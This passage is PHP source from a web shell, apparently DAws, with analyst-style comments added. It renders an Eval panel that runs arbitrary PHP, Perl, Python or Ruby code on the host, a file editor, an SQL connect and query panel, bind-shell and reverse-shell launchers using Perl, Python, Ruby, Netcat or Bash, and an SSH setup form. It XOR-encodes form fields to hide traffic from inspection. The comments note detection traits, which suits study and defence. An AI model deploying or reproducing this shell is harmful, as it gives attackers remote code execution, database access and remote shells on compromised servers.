            <input type='hidden' name='dir' value='".$_POST["old_dir"]."' />
            <input type='submit' value='Go Back' class='a_button' />
        </form>";

        // Writable files get an editable form posting 'edit' + 'location'; read-only files a bare textarea.
        if (is_writable($dir)) {
            echo "
        <table class='flat-table' style='table-layout: fixed;'>
            <tr>
                <form action='#File Manager' method='post' onsubmit=\"xorencr(['edit'])\">
                    <td style='padding:1%;'>
                        <textarea id='edit' name='edit'>$content</textarea><br/>
                        <input type='hidden' name='location' value='".xor_this($dir)."'/>
                        <input type='hidden' name='old_dir' value='".$_POST["old_dir"]."' />
                        <input type='submit' value='Edit'/>
                    </td>
                </form>
            </tr>
        </table>";
        } else {
            echo "
        <table class='flat-table' style='table-layout: fixed;'>
            <tr>
                <td><textarea name='edit'>$content</textarea></td>
            </tr>
        </table>";
        }
    }
} else {
    // Unreadable or missing path: offer a way back (old_dir reflected as-is, see note at top) and
    // report the failure with $dir interpolated unescaped. ("read readable" is a typo in the runtime string.)
    echo "
    <form action='#File Manager' method='post'>
        <input type='hidden' name='dir' value='".$_POST["old_dir"]."' />
        <input type='submit' value='Go Back' class='a_button' />
    </form>
    <p class='danger'>`$dir` is not read readable or doesn't exist!</p>";
}
2278
// ---- Eval section: arbitrary-code entry point for PHP and, when available, Perl / Python / Ruby ----
// Markup note: `action='#Eval 'method='post'` is missing the space between attributes (runtime string,
// left as-is here). The language <option> values are xor_this()-encoded like every other form value.
// $_SESSION["perl"|"python"|"ruby"] are set elsewhere; from their use as the 2nd argument of
// execute_script() below they presumably hold interpreter paths (null when absent).
echo "
<h3><A NAME='Eval' href='#Eval'>Eval</A></h3>

<p class='danger'>DO NOT include '<?php' at the beginning or '?>' at the end for Php.</p>

<table class='flat-table' style='table-layout: fixed;'>
    <tr>
        <form action='#Eval 'method='post' onsubmit=\"xorencr(['eval_code'])\">
            <td style='padding:1%;'>
                <input type='hidden' name='dir' value='".xor_this($dir)."' />
                <textarea name='eval_code' id='eval_code'></textarea><br/>
                <input type='submit' value='Execute'/>
                <select name='eval_lang'>
                    <option value='".xor_this("Php")."'>Php</option>";
if ($_SESSION["perl"] != null) {
    echo "<option value='".xor_this("Perl")."'>Perl</option>";
}
if ($_SESSION["python"] != null) {
    echo "<option value='".xor_this("Python")."'>Python</option>";
}
if ($_SESSION["ruby"] != null) {
    echo "<option value='".xor_this("Ruby")."'>Ruby</option>";
}
echo "
                </select>
                <input name='output_needed' type='checkbox'/>Show Output
            </td>
        </form>
    </tr>";

// Handler for a submitted Eval form. Both POST fields are decoded with unxor_this() (not in view — the
// inverse of xor_this(), presumably using the session key shown in the left panel).
// Detection note: the request body carries `eval_code` / `eval_lang` as base64-looking blobs, decodable
// with the key from the same session's responses.
if (isset($_POST["eval_code"])) {
    $eval_code = unxor_this($_POST["eval_code"]);
    $eval_lang = unxor_this($_POST["eval_lang"]);

    if (isset($_POST["output_needed"])) {
        $output_needed = True;
    } else {
        $output_needed = False;
    }

    // Dispatch on the decoded language. execute_php() is called without echo whereas execute_script()'s
    // return value is echoed — presumably execute_php() prints its own output; verify against its
    // definition. An unrecognised $eval_lang executes nothing and leaves the cell empty.
    echo "<tr><td>";
    if ($eval_lang == "Php") {
        execute_php($eval_code, $output_needed);
    } else if ($eval_lang == "Perl") {
        echo execute_script($eval_code, $_SESSION["perl"], "pl", $output_needed);
    } else if ($eval_lang == "Python") {
        echo execute_script($eval_code, $_SESSION["python"], "py", $output_needed);
    } else if ($eval_lang == "Ruby") {
        echo execute_script($eval_code, $_SESSION["ruby"], "rb", $output_needed);
    }
    echo "</td></tr>";
}
2331
// ---- Sql Connect section ----
// Connection form: host / user / password / database, all XOR-encoded client-side by xorencr() before
// submission (the password field is a plain type='text' input). Same `'#Sql Connect 'method` attribute
// typo as the Eval form. The connection handler itself is outside this view.
echo "
</table>

<h3><A NAME='Sql Connect' href='#Sql Connect'>Sql Connect</A></h3>

<table class='flat-table' style='table-layout: fixed;'>

    <form action='#Sql Connect 'method='post' onsubmit=\"xorencr(['sql_host', 'sql_user', 'sql_pass', 'sql_database'])\">
    <tr>
        <td style='padding:1%;'>
            Connection:
            <input placeholder='Sql Host' type='text' name='sql_host' id='sql_host' style='width:15%;'/>
            <input placeholder='Sql User' type='text' name='sql_user' id='sql_user' style='width:15%;'/>
            <input placeholder='Sql Password' type='text' name='sql_pass' id='sql_pass' style='width:15%;'/>
            <input placeholder='Sql Database' type='text' name='sql_database' id='sql_database' style='width:15%;'/>
            <input type='hidden' name='dir' value='".xor_this($dir)."' />
            <input type='submit' value='Connect'/>
        </td>
    </tr>
    </form>";

// Query form, shown only once $_SESSION["mysqli"] (set elsewhere, presumably on a successful connect)
// is true. 'save_output' is a checkbox whose handling is not in view.
if ((isset($_SESSION["mysqli"])) && ($_SESSION["mysqli"] == True)) {
    echo "
    <form action='#Sql Connect' method='post' onsubmit=\"xorencr(['sql_execute'])\">
    <tr>
        <td style='padding:1%;'>
            Query: <input type='text' style='width:40%;' name='sql_execute' id='sql_execute'/>
            <input type='hidden' name='dir' value='".xor_this($dir)."' />
            <input type='submit' value='Execute'/>
            <input type='checkbox' name='save_output' value='Save Output'/>Save Output
        </td>
    </tr>
    </form>";
}

// $GLOBALS["sql_output"] is produced outside this view (presumably by the query handler) and is dumped
// into a <textarea> verbatim, with no escaping.
if (isset($GLOBALS["sql_output"])) {
    echo "
    <tr>
        <td style='padding:1%;'><textarea>".$GLOBALS["sql_output"]."</textarea></td>
    </tr>";
}
2373
// ---- Bind Shells / Reverse Shells forms ----
// Only the HTML forms are rendered here; the handlers that act on bind_port / bs_lang and
// reverse_ip / reverse_port / rs_lang live outside this view. Language options are offered when the
// corresponding session interpreter entry is non-null.
// Detection note: those POST field names, together with the 'background' checkbox, identify requests to
// this section in captured traffic.
echo "
</table>

<h3><A NAME='Bind Shells' href='#Bind Shells'>Bind Shells</A></h3>

<table class='flat-table' style='table-layout: fixed;'>
<form method='post' action='#Bind Shells' onsubmit=\"xorencr(['bind_port'])\">
    <tr>
        <td style='padding: 1%'>
            Info:
            <input name='bind_port' id='bind_port' placeholder='Port' type='text'/>
            <select name='bs_lang'>";
if ($_SESSION["perl"] != null) {
    echo "<option value='".xor_this("Perl")."'>Perl</option>";
}
if ($_SESSION["python"] != null) {
    echo "<option value='".xor_this("Python")."'>Python</option>";
}
if ($_SESSION["ruby"] != null) {
    echo "<option value='".xor_this("Ruby")."'>Ruby</option>";
}
// Netcat option: non-Windows only, and only if execute_command("nc", True) is truthy. The meaning of the
// second argument is not visible here — presumably a "check availability" flag; verify.
if (($_SESSION["windows"] == False) && (execute_command("nc", True))) {
    echo "<option value='".xor_this("Netcat")."'>Netcat</option>";
}
// Reverse-shell form. Note: its action anchor is '#Bind Shells' and its submit button reads 'Bind' —
// copied from the bind form above; the anchor is harmless, the label is misleading.
echo "
            </select>
            <input type='submit' value='Bind'/>
            <input type='checkbox' name='background'/>Run in background
        </td>
    </tr>
</form>
</table>

<h3><A NAME='Reverse Shells' href='#Reverse Shells'>Reverse Shells</A></h3>

<table class='flat-table' style='table-layout: fixed;'>
<form method='post' action='#Bind Shells' onsubmit=\"xorencr(['reverse_ip', 'reverse_port'])\">
    <tr>
        <td style='padding: 1%'>
            Info:
            <input name='reverse_ip' id='reverse_ip' placeholder='IP Address' type='text'/>
            <input name='reverse_port' id='reverse_port' placeholder='Port' type='text'/>
            <select name='rs_lang'>";
if ($_SESSION["perl"] != null) {
    echo "<option value='".xor_this("Perl")."'>Perl</option>";
}
if ($_SESSION["python"] != null) {
    echo "<option value='".xor_this("Python")."'>Python</option>";
}
if ($_SESSION["ruby"] != null) {
    echo "<option value='".xor_this("Ruby")."'>Ruby</option>";
}
// Bash option needs no interpreter lookup; it is simply hidden on Windows sessions.
if ($_SESSION["windows"] == False) {
    echo "<option value='".xor_this("Bash")."'>Bash</option>";
}
echo "
            </select>
            <input type='submit' value='Bind'/>
            <input type='checkbox' name='background'/>Run in background
        </td>
    </tr>
</form>
</table>";
2437
// ---- Setup SSH section (non-Windows sessions only) and page close ----
// $_SESSION["windows"] is a bool set at session start from PHP_OS. Unlike every other form on the page,
// this one carries no hidden 'dir' field, so the File Manager path is not preserved across its submit.
// The ssh_user / ssh_port / home_dir fields are XOR-encoded client-side; the handler is outside this view.
if ($_SESSION["windows"] == False) { //linux only for now
    echo "
    <h3><A NAME='Setup SSH' href='#Setup SSH'>Setup SSH</A></h3>

    <p class='danger'>Make sure you upload all the files in 'https://github.com/dotcppfile/DAws/tree/master/phpseclib%20-%20DAws', using the File Manager, first.</p>

    <table class='flat-table' style='table-layout: fixed;'>
    <form method='post' action='#Setup SSH' onsubmit=\"xorencr(['ssh_user', 'ssh_port', 'home_dir'])\">
        <tr>
            <td style='padding: 1%'>
                Info:
                <input name='ssh_user' id='ssh_user' placeholder='SSH Username' type='text'/>
                <input name='ssh_port' id='ssh_port' placeholder='SSH Port' type='text'/>
                <input name='home_dir' id='home_dir' placeholder='Home Directory' type='text'/>
                <input type='submit' value='Go'/>
            </td>
        </tr>
    </form>
    </table>";
}

// Close the centre column and the document.
echo "
</center>
</div>

</body>
</html>";
2465?>